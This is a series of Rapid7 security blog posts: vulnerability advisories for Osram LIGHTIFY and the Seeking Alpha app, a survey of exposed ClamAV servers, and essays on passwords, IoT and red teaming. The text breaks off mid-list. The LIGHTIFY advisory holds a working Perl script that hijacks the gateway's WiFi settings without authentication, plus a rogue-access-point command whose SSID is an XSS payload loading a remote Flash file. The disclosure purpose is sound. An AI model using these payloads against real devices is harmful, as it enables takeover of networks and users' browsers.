
Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description                             Status    Platform   R7 ID           CVE
Cleartext WPA2 PSK                      Fixed     Home       R7-2016-10.1    CVE-2016-5051
Lack of SSL Pinning                     Unfixed   Home       R7-2016-10.2    CVE-2016-5052
Pre-Authentication Command Execution    Fixed     Home       R7-2016-10.3    CVE-2016-5053
ZigBee Network Command Replay           Unfixed   Home       R7-2016-10.4    CVE-2016-5054
Web Management Console Persistent XSS   Fixed     Pro        R7-2016-10.5    CVE-2016-5055
Weak Default WPA2 PSKs                  Fixed     Pro        R7-2016-10.6    CVE-2016-5056
Lack of SSL Pinning                     Unfixed   Pro        R7-2016-10.7    CVE-2016-5057
ZigBee Network Command Replay           Unfixed   Pro        R7-2016-10.8    CVE-2016-5058
Cached Screenshot Information Leak      Fixed     Pro        R7-2016-10.9    CVE-2016-5059

 

Product Description

According to the vendor's January 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is sold to both residential and commercial customers, via the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape and is compatible with other ZigBee-based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad, revealed that the WiFi WPA2 pre-shared key (PSK) of the user's home WiFi network is stored in cleartext in the file /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1-40ECBDBDF692/Library/Preferences/com.osram.lightify.home.plist. Examining this file reveals the cleartext string, as shown in Figure 1:

Figure 1, Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to avoid storing potentially sensitive information, such as WiFi PSKs and passwords, in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and require at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.
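To illustrate the idea, here is a minimal sketch of fingerprint-based pinning, assuming a Python client and a hypothetical endpoint and fingerprint; the LIGHTIFY apps are native mobile applications, so this is conceptual only and not the vendor's code.

import hashlib
import ssl

# Hypothetical values for illustration; not the vendor's actual endpoint or fingerprint.
HOST, PORT = "cloud.example.com", 443
PINNED_SHA256 = "d4c9d9027326271a89ce51fcaf328ed673f17be33469ff979e8ab8dd501e664f"

def certificate_matches_pin(host, port):
    """Fetch the server certificate and compare its SHA-256 fingerprint to the pinned value."""
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest() == PINNED_SHA256

if __name__ == "__main__":
    if not certificate_matches_pin(HOST, PORT):
        raise SystemExit("Fingerprint mismatch -- possible MitM; refusing to send credentials")

A client that performs a check like this refuses to talk to an interception proxy even when the proxy presents a certificate signed by an otherwise trusted authority.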

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => 'tcp',
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the ZigBee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture the ZigBee communication at any time and later replay those commands to disrupt lighting services, without any other form of authentication.

Mitigation for R7-2016-10.4

A vendor-supplied patch should implement routine rekeying of the ZigBee-enabled components of the system.

 

Absent a vendor-supplied patch, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor-supplied patch should ensure that all data is filtered and that special characters such as > and < are properly escaped before being displayed by the web management console.

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight character PSK using only the characters from the set "0123456789abcdef". This extremely small keyspace of limited characters and a fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours
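The arithmetic behind these results is straightforward. The following quick sketch shows the size of the keyspace; the guess rate is an assumed, illustrative figure, not a measurement from this research.

# Keyspace of an 8-character PSK drawn only from "0123456789abcdef"
charset_size = 16
key_length = 8
keyspace = charset_size ** key_length      # 4,294,967,296 candidate keys
assumed_rate = 200_000                     # assumed WPA2 guesses per second for a GPU rig (illustrative only)
worst_case_hours = keyspace / assumed_rate / 3600
print(f"{keyspace:,} keys; exhausted in at most ~{worst_case_hours:.1f} hours at {assumed_rate:,} guesses/sec")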

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement longer default PSKs utilizing a larger keyspace that includes uppercase and lowercase alphanumeric characters and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs following the above advice, and not rely on the defaults shipped by the vendor.
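As a sketch of what a stronger key could look like, the following generates a random 63-character WPA2 passphrase (the maximum length) from a large character set; this is illustrative, not the vendor's provisioning code.

import secrets
import string

# WPA2 passphrases may be 8-63 printable ASCII characters; use the maximum, since these
# keys are provisioned by software rather than memorized by humans.
alphabet = string.ascii_letters + string.digits + string.punctuation
psk = "".join(secrets.choice(alphabet) for _ in range(63))
print(psk)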

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application caches a screenshot of the current page when the iPad home button is pressed, storing it in the folder /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433AB0A1-EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osram.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the iPad. As shown in Figure 7, the cleartext password of the gateway is displayed in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should display a default page for the Downscale function when the home button is pressed, and should obfuscate with asterisks all passwords and keys displayed on the application configuration pages.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

Over the last few months, Jordan Rogers and I have been speaking about the benefits of doing the basics right in information security.

 

Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips.

 

We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU, where it was filmed and uploaded to YouTube.

 

Take a look if you'd like to hear the perspective of an Incident Response person combined with a Blue Team person, information from real problems we observed, as well as recommendations on how to mitigate those issues!

 

From the trenches: Breaches, Stories, Simple Security Solutions - YouTube

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.

 

Recently, I wrote about my thoughts on why we feel like we have to force short-term password changes in the name of “security.” Since that time, Microsoft made an announcement to step in and help set its users (and itself) up for success with more stringent password requirements for Microsoft Account and Azure Active Directory. Sad it has come to this – a vendor doing what they must do to force people to use stronger passwords. We’re devolving as computer users.

 

Shown in study after study, e.g. Ponemon, Verizon, and (especially) this insightful research from Rapid7: the basics are ignored, we cry out for newer and better security controls, government regulations grow – and, yet, nothing gets better. Apparently information security basics, such as fixing weak passwords, are just too much to ask for. Take, for instance, Security, Accuracy, and Privacy in Computer Systems – a great book written by the late James Martin. It covers all sorts of security basics – what's needed and how to balance it all out. That book was written in 1973. We still can't get security right. Not even passwords.

 

So, what is the answer? Is it IT’s fault? IT and security teams, and the executives heading things up are certainly complicit. Some ignore password vulnerabilities. Some have trouble getting their messages across. Others are afraid to say anything, especially given the predictable pushback from management. Users are on the hook as well. As much as we try to set them up for success through technical controls and awareness/training, at some point, they need to be held accountable. They’re grown-ups and it’s not like this whole computer password thing is something new.

 

Maybe we should continue down the path of making things more complex through regulations, lawyers, and technical controls that promise to make everything better. Ha! Not unlike attempts at failed social initiatives involving emotional responses to crises rather than due process, I suspect we’ll continue down the path of more laws, more policies, more audits, and a growing false sense of security. Our current approach to passwords is not working. Maybe that’s okay – perhaps someone else can figure it out down the road.

 

Mark Matteson was quoted as saying “Good habits are hard to form and easy to live with. Bad habits are easy to form and hard to live with. Pay attention. Be aware. If we don’t consciously form good ones, we will unconsciously form bad ones.” With weak passwords – more than any other computer security vulnerability – what I believe we need is discipline. Discipline on the part of IT and security teams. Discipline on the part of users. Discipline on the part of management. That and some backbone to see things through over time (again, especially with passwords) until the challenges are resolved. Unless and until something changes in this area, I suspect we’ll continue down this path of ignorant bliss and continued breaches.

Due to a lack of encryption in communication with the associated web services, the Seeking Alpha mobile application for Android and iPhone leaks personally identifiable and confidential information, including the username and password to the associated account, lists of user-selected stock ticker symbols and associated positions, and HTTP cookies.

Credit

Discovered by Derek Abdine (@dabdine) of Rapid7, Inc., and disclosed in accordance with Rapid7’s disclosure policy.

Product Description

Seeking Alpha provides individuals with the ability to track and quantify their stock portfolio holdings. The vendor’s website states “Seeking Alpha is a platform for investment research, with broad coverage of stocks, asset classes, ETFs and investment strategy. In contrast to other equity research platforms, insight is provided by investors and industry experts rather than sell-side analysts.”

Exploitation

An attacker in a privileged position on the target's network can intercept, view, and modify communications between the Seeking Alpha mobile application and its associated web services trivially, due to the reliance on HTTP cleartext communications, rather than HTTPS. HTTP is used for routine polling for stock ticker symbols the user has configured, which may reveal overly personal financial information about the user that could be used in a targeted attack.

 

In addition, HTTP is used for the authentication sequence. The user's full e-mail address, password, and HTTP session tokens are transmitted in the clear, as are less critical elements such as the fingerprintable User-Agent (which reveals build and platform information).
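As a rough sketch of how little effort this takes for a passive observer, the following assumes the Python scapy package and a hypothetical capture.pcap recorded on a shared network; the parameter names searched for are illustrative, not an exact list of the application's fields.

from scapy.all import rdpcap, TCP, Raw   # assumes the scapy package is installed

# Hypothetical capture file recorded on an open Wi-Fi network you are authorized to monitor.
for pkt in rdpcap("capture.pcap"):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt[TCP].dport == 80:
        payload = bytes(pkt[Raw].load)
        # Look for credential- or session-bearing requests; parameter names are illustrative.
        if b"password" in payload or b"user_remember_token" in payload:
            print(payload[:200])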

 

In this sample, a user's login information (username and password) may be obtained using a simple packet capture:

 

Mobile device characteristics can also be retrieved (Android OS version and Android Device Token are present):

 

Furthermore, persistent session information (the user ID, email address and the session token aka “user_remember_token”) is clearly visible:

 

Stock ticker symbols are also included (either when added, or when receiving portfolio holdings, which may include positions per symbol if the user has entered those):

 

Curiously, HTTPS requests to https://seekingalpha.com using a normal browser on a traditional PC or laptop are also redirected to HTTP services, rather than the reverse. This includes the authentication sequence. This observation suggests that the preference for HTTP over HTTPS permeates the engineering practices at Seeking Alpha.

Mitigation

Until Seeking Alpha provides a fix for the mobile application, users are strongly advised to not use the application while connected to untrusted networks. The use of a VPN will also help alleviate the most likely risk of a nearby eavesdropper on a public network, but note that this would protect communication only as far as the VPN endpoint.

Disclosure Timeline

This vulnerability is being disclosed in accordance with Rapid7's disclosure policy.

 

  • Tue, May 03, 2016: Initial contact to security@seekingalpha.com and other aliases.
  • Wed, May 19, 2016: Confidential disclosure to CERT (VR-142).
  • Wed, Jul 13, 2016: Public disclosure (planned).


A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response.

 

Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings.

 

Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post), a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP port 3310, including nearly:

 

  • 16,000 squid proxy servers
  • 600 nginx servers (20,000 HTTP servers in all)
  • 500 database servers
  • 600 SSH servers

 

But, you came here to learn about the ClamAV servers, so let's dig in.

 

Clam Hunting

 

We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses.
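For the curious, the check itself is simple. The following is a minimal sketch of a clamd VERSION query over 3310/TCP against a hypothetical address; only run this against hosts you are authorized to test.

import socket

def clamav_version(host, port=3310, timeout=5.0):
    """Send clamd's newline-terminated VERSION command and return the banner (e.g. 'ClamAV 0.97.5/...')."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"nVERSION\n")
        return s.recv(1024).decode(errors="replace").strip()

print(clamav_version("198.51.100.10"))   # hypothetical target address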

 

5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions:

 

[Chart: distribution of ClamAV versions found by the study]

You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forget" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.

 

[Chart: zoomed view of the most recent ClamAV versions in the study]

 

A Banner Haul

 

Now, not all VERSION queries respond with complete banner information, but over half did, and the response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of these nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes.

 

[Chart: signature update status of the exposed ClamAV servers]

 

As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments.

 

As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes:

 

AS      AS Name                                                          Count    %
4766    KIXS-AS-KR Korea Telecom, KR                                     1,733    29.1%
16276   OVH, FR                                                          513      8.6%
3786    LGDACOM LG DACOM Corporation, KR                                 316      5.3%
25394   MK-NETZDIENSTE-AS, DE                                            282      4.7%
35053   PHADE-AS, DE                                                     263      4.4%
11994   CZIO-ASN - Cruzio, US                                            251      4.2%
41541   SWEB-AS Serveisweb, ES                                           175      2.9%
9318    HANARO-AS Hanaro Telecom Inc., KR                                147      2.5%
23982   SENDB-AS-KR Dongbu District Office of Education in Seoul, KR     104      1.7%
24940   HETZNER-AS, DE                                                   65       1.1%

 

Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger:

 

Rank   Country               Count    %
1      Korea, Republic of    2,463    41.4%
2      Germany               830      14.0%
3      United States         659      11.1%
4      France                512      8.6%
5      Spain                 216      3.6%
6      Italy                 171      2.9%
7      United Kingdom        99       1.7%
8      Russian Federation    78       1.3%
9      Japan                 67       1.1%
10     Brazil                62       1.0%

 

 

What are some takeaways from these findings?

 

  • Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners.

  • While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet.

  • Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet.

  • Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice.

  • Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming.

  • Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally.

 

Fin

 

Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on.

 

Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

Nearly every conversation I have had around the Internet of Things (IoT) and what it means to an organization starts off with the question, “What is IoT?” This question is often followed by many people giving many different answers. I'm sure I won't solve this problem here in a single blog post, but I hope to add some food for thought.

 

What IoT is Not

 

You would expect to start off with a list of things that make up IoT, but I was thinking maybe the first thing is to define what it is not, if that is even doable. Reading through a 2014 article in NetworkWorld, "Eight Internet Things That are Not IoT," we find the following list of items analysts have said are not IoT:

 

  • Desktops
  • Laptops
  • Tablets
  • Smartphones
  • Traditional Mobile Phones
  • TVs
  • DVD/MP3 players
  • Game consoles

 

This list demonstrates how fast technology is evolving.  While it was a pretty solid list when it was created two years ago, I think we can all agree that today, it's no longer accurate. Significant technological innovations in a number of these items means they are now considered either to be IoT in themselves, or directly tied to an IoT ecosystem. For example, smart TVs have the ability to watch us, record our every move, and communicate that information to a cloud API over the Internet. They also allow us to communicate and control them via voice and applications on our laptops, tablets, and smartphones.

 


 

Though the article discussed what is not classified as IoT based on its physical purpose or its need for human interaction, it has quickly become outdated. Using this information, we can conclude that, given the rate of innovation, what isn't categorized as IoT today may very well be tomorrow, so trying to define what isn't IoT isn't necessarily the best direction to go in.

 

Traits of IoT

 

Maybe the better way to answer "What is IoT?" is by defining the functions that make something IoT, although this process has its own issues. For example, to be classified as part of IoT, must a device communicate with the Internet? If we claim that this is a litmus test, a large quantity of technologies currently classified as IoT and in use in industrial and enterprise settings would not meet this requirement.

 

After reading through a number of documents, papers, and definitions on the matter, I have identified four common elements that are part of the typical identification of IoT:

 

  • Interrelated devices: IoT environments always consist of multiple interrelated systems and technologies which can include: gateways, sensors, actuators, mobile technology, cloud systems and host systems.
  • Collecting and sharing data: IoT technology is always found to collect and/or share data from sensors and controllers. This data may be as simple as audio commands from your smart TV to the cloud, or as sensitive as data from a temperature sensor used to control a high-pressure boiler system within a SCADA environment.
  • Networked together: IoT systems are always network interconnected. This is required to facilitate the exchange of data between the interrelated devices that make up an IoT environment.
  • Embedded electronics: Embedded electronics are the cornerstone of IoT. Their specialized functionality and reduction in size have helped fuel the growth of IoT. Without them, IoT would not exist.

 

Devices vs. Ecosystem

 

Of course, these four items on their own do not completely define IoT, or better stated, do not completely define the IoT ecosystem. Before we dig into the remainder of this definition, let's explore the concept of an IoT ecosystem. This is key to understanding IoT - we should not consider the technology as stand-alone devices, but rather as elements of a rich, interconnected, technological ecosystem. In a previous blog I stated the following:

 

“ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology.”

 

The ecosystem encompasses all of the interrelated parts that make an IoT solution work. Based on that, I believe any device or technology can be part of an existing IoT ecosystem, including desktop computers. If we try to label any technology as "not IoT" we are going to end up either rewriting the rules six months down the road or completely failing when we try to properly define security risks as they relate to deployed IoT solutions. The best way to solve these issues is to understand what an IoT ecosystem is so that we can more effectively define risks and develop solutions to mitigate those risks.

 

Traits of an IoT Ecosystem

 

As I said before, IoT is not about stand-alone devices, and if we try to approach it that way we will fall short in trying to secure it. IoT is an ecosystem that encompasses multiple devices (physical and virtual), technologies (mobile, cloud, etc.), communication methods (Ethernet, WiFi, ZigBee, etc.), and locations (internet, cloud, remote monitoring and control).

 

Continuing down that path, the following five bullets expand on the Traits of IoT listed above. There is no need for all of these to exist, but typically I find at least a couple of these items do apply to all IoT ecosystems I have encountered.

 

  • Mobile technology
  • Multiple end nodes (sensors, actuators)
  • Cloud APIs
  • Multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave)
  • Remote Monitoring or Control

 

I believe by combining these two lists above into a series of questions we can identify the most common traits that make up an IoT ecosystem. This will help us identify the "whole" of an IoT ecosystem. In the end, by properly understanding and identifying the ecosystem we can better test, maintain, and properly secure our rapidly expanding IoT world.

 

  • Which interrelated devices interact as part of this IoT environment?
  • How and where do they collect and share data?
  • Which technologies are networked together?
  • Which systems utilize embedded electronics?
  • Does it use mobile technology? How and where?
  • Are multiple end nodes (sensors, actuators) being used?
  • What and where are the Cloud APIs and how do they interrelate?
  • Are multiple communications methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave) being used? Which ones?
  • What systems and locations use remote monitoring or control?

 

Hopefully I have given some food for thought and we can work on answering the bigger question, “What is the IoT ecosystem and how do we secure it?” I would love to hear your thoughts on this subject as we work together to secure the world of IoT.

In a fight between pirates and ninjas, who would win? I know what you are thinking. “What in the world does this have to do with security?” Read on to find out but first, make a choice: Pirates or Ninjas?

 

Before making that choice, we must know what the strengths and weaknesses are for each:

 


Pirates

Strengths                      Weaknesses
Strong                         Loud
Brute-Force Attack             Drunk (Some say this could be a strength too)
Great at Plundering            Can be Careless
Long-Range Combat

Ninjas

Strengths                      Weaknesses
Fast                           No Armor
Stealthy                       Small
Dedicated to Training
Hand-to-Hand/Sword Combat

 

 


 

It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.

 

The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.

 

Penetration Testing

 

Penetration testing is usually rolled into one big umbrella with all security assessments. A lot of people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. However, this is a misconception. While they may have similar components, each one is different and should be used in different contexts.

 

At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk they pose. This does not necessarily mean uncovering new vulnerabilities (zero days); it is more often looking for known, unpatched vulnerabilities. Like Vulnerability Assessments, Penetration Testing is designed to find vulnerabilities and to confirm they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done numerous ways and, once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not, or Domain Administrator access alone is not enough.

 

Who needs a penetration test? Some regulatory frameworks, such as SOX and HIPAA, require it, but organizations already performing regular security audits internally, and implementing security training and monitoring, are likely ready for a penetration test.

 

Red Team Assessment

 

A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting the organization while looking to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment could run 3-4 weeks or longer, and often consists of multiple people.

 

A Red Team Assessment does not look for multiple vulnerabilities but for those vulnerabilities that will achieve their goals. The goals are often the same as the Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone though and should be performed by organizations with mature security programs. These are organizations that often have penetration tests done, have patched most vulnerabilities, and have generally positive penetration test results.

 

The Red Team Assessment might consist of the following:

 

